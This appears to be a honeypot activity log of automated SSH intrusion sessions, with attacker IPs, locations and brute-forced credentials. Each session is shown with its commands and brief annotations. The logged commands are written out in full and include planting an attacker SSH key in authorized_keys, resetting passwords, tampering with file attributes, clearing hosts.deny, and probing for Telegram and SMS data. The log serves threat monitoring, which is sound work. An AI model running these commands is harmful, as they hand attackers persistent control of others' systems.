$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo "root:sw2yv0itZJgX"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo -e "123\ntTL3lcm6eQgA\ntTL3lcm6eQgA"|passwd|bash
$ Enter new UNIX password:
$ echo "123\ntTL3lcm6eQgA\ntTL3lcm6eQgA\n"|passwd
🎭 crumpet_root (185.195.13.179) β€” Slough, United Kingdom Β· 1 session Β· 20 cmds
2026-06-05 08:41 EDT Β· as lab/lab
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "lab\nLJ1DIeljD2WK\nLJ1DIeljD2WK"|passwd|bash
$ Enter new UNIX password:
$ echo "lab\nLJ1DIeljD2WK\nLJ1DIeljD2WK\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 spice_root_4 (119.18.55.118) β€” Nashik, India Β· 1 session Β· 19 cmds
2026-06-05 08:39 EDT Β· as root/China@123
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:LWxBqPOmatEn"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 sakura_root_2 (20.153.204.5) β€” Tokyo, Japan Β· 1 session Β· 20 cmds
2026-06-05 08:05 EDT Β· as jimmy/jimmy123
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "jimmy123\nTGX4BDJy6AMv\nTGX4BDJy6AMv"|passwd|bash
$ Enter new UNIX password:
$ echo "jimmy123\nTGX4BDJy6AMv\nTGX4BDJy6AMv\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 wok_root_5 (101.126.54.36) β€” Chaowai, China Β· 1 session Β· 15 cmds
2026-06-05 05:17 EDT Β· as tkj/tkj
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "tkj\nhiYiIoVEa5wF\nhiYiIoVEa5wF"|passwd|bash
$ Enter new UNIX password:
$ echo "tkj\nhiYiIoVEa5wF\nhiYiIoVEa5wF\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ ls -lh $(which ls)
$ which ls
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 stroopwafel_sol_2 (176.65.139.247) β€” Eygelshoven, The Netherlands Β· 1 session Β· 1 cmd
2026-06-05 03:46 EDT Β· as ubuntu/Hello@123
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -s -v -n -r -m
🎭 panda_root_7 (121.236.3.40) β€” Nanjing, China Β· 1 session Β· 9 cmds
2026-06-05 03:39 EDT Β· as root/guest
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ /ip cloud print
$ ifconfig // network mapping
$ uname -a // OS/kernel identification
$ cat /proc/cpuinfo // CPU profiling
$ ps | grep '[Mm]iner'
$ ps -ef | grep '[Mm]iner'
$ ls -la ~/.local/share/TelegramDesktop/tdata /home/*/.local/share/TelegramDesktop/tdata /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*
$ locate D877F783D5D3EF8Cs
$ echo Hi | cat -n
🎭 panda_root_8 (42.178.17.143) β€” Shenyang, China Β· 1 session Β· 1 cmd
2026-06-05 03:33 EDT Β· as root/123456
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -s -m
🎭 bike_sol_4 (45.153.34.195) β€” Eygelshoven, Netherlands Β· 1 session Β· 1 cmd
2026-06-05 01:37 EDT Β· as user/user
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -s -v -n -r -m
🎭 star_root_9 (209.99.191.19) β€” San Francisco, United States Β· 4 sessions Β· 61 cmds
2026-05-07 04:02 EDT Β· as root/nE7jANo, root/peng123456, ubuntu/1qaz2wsx@123
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—4 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—4 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—3 // CPU profiling
$ echo "root:Z5MKGtUPH7Sr"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—3 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—3
$ ls -lh $(which ls) Γ—3
$ which ls Γ—3
$ crontab -l Γ—3 // persistence setup
$ w Γ—3 // logged-in users check
$ uname -m Γ—3
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—3 // CPU profiling
$ top Γ—3 // process monitoring
$ uname Γ—3 // OS identification
$ uname -a Γ—3 // OS/kernel identification
$ whoami Γ—3 // privilege check
$ lscpu | grep Model Γ—3
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—3
$ echo -e "1qaz2wsx@123\ntr5bnLbXCdSL\ntr5bnLbXCdSL"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "1qaz2wsx@123\ntr5bnLbXCdSL\ntr5bnLbXCdSL\n"|passwd
$ echo -e "ubuntu.2021\nRNeXk5a7HEWw\nRNeXk5a7HEWw"|passwd|bash
$ echo "ubuntu.2021\nRNeXk5a7HEWw\nRNeXk5a7HEWw\n"|passwd
🎭 wok_root_6 (106.119.165.171) β€” Suzhou, China Β· 1 session Β· 19 cmds
2026-06-04 22:36 EDT Β· as root/Welcome1234
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:gWoPTy5FCxNy"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 cowboy_root_20 (69.12.64.44) β€” Los Angeles, United States Β· 1 session Β· 20 cmds
2026-06-04 22:33 EDT Β· as gitlab-runner/runner
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "runner\nkamG32AjEI1R\nkamG32AjEI1R"|passwd|bash
$ Enter new UNIX password:
$ echo "runner\nkamG32AjEI1R\nkamG32AjEI1R\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 wraith_root_2 (190.119.63.81) β€” Lima, Peru Β· 1 session Β· 1 cmd
2026-06-04 21:55 EDT Β· as root/!Q2w3e4r
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -s -v -n -r -m
🎭 ghost_root_49 (61.231.218.225) β€” Hualien City, Taiwan Β· 2 sessions Β· 38 cmds
2026-06-04 19:49 EDT Β· as root/123Qwe,./, root/q1w2e3r4t5y6
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo "root:U7B6P08s8su0"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—2 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo "root:gxZ6L5Mqxbtw"|chpasswd|bash
🎭 roo_root_2 (20.5.130.110) β€” The Rocks, Australia Β· 1 session Β· 20 cmds
2026-06-04 19:35 EDT Β· as vpn/Vpn@2026
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "Vpn@2026\nb3lnwhxjQW4Q\nb3lnwhxjQW4Q"|passwd|bash
$ Enter new UNIX password:
$ echo "Vpn@2026\nb3lnwhxjQW4Q\nb3lnwhxjQW4Q\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 panda_root_9 (14.103.118.113) β€” Haidian, China Β· 1 session Β· 19 cmds
2026-06-04 19:30 EDT Β· as root/123Qwe,./
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:Q7IPz4b33FgI"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 chai_root_10 (103.248.120.6) β€” Meerut, India Β· 3 sessions Β· 59 cmds
2026-05-26 18:54 EDT Β· as john/12345678, root/rootroot01, ubuntu/fjbdfdjkdsfs541544AA@@
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—3 // CPU profiling
$ echo -e "12345678\nsnsqda9RJfCs\nsnsqda9RJfCs"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "12345678\nsnsqda9RJfCs\nsnsqda9RJfCs\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—3 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—3
$ ls -lh $(which ls) Γ—3
$ which ls Γ—3
$ crontab -l Γ—3 // persistence setup
$ w Γ—3 // logged-in users check
$ uname -m Γ—3
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—3 // CPU profiling
$ top Γ—3 // process monitoring
$ uname Γ—3 // OS identification
$ uname -a Γ—3 // OS/kernel identification
$ whoami Γ—3 // privilege check
$ lscpu | grep Model Γ—3
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—3
$ echo "root:pTdrmDB7ccAA"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ echo -e "fjbdfdjkdsfs541544AA@@\nKMK8P1phKjVx\nKMK8P1phKjVx"|passwd|bash
$ echo "fjbdfdjkdsfs541544AA@@\nKMK8P1phKjVx\nKMK8P1phKjVx\n"|passwd
🎭 seoul_root_9 (14.63.198.239) β€” Seongnam-si, South Korea Β· 1 session Β· 20 cmds
2026-06-04 18:25 EDT Β· as admin/AA-2025
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "AA-2025\n9WZ1q6aC440Q\n9WZ1q6aC440Q"|passwd|bash
$ Enter new UNIX password:
$ echo "AA-2025\n9WZ1q6aC440Q\n9WZ1q6aC440Q\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 wraith_root_39 (31.47.99.147) β€” RoΕΎnov pod RadhoΕ‘tΔ›m, Czechia Β· 2 sessions Β· 39 cmds
2026-06-04 17:35 EDT Β· as john/12345678, root/Vv123456
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
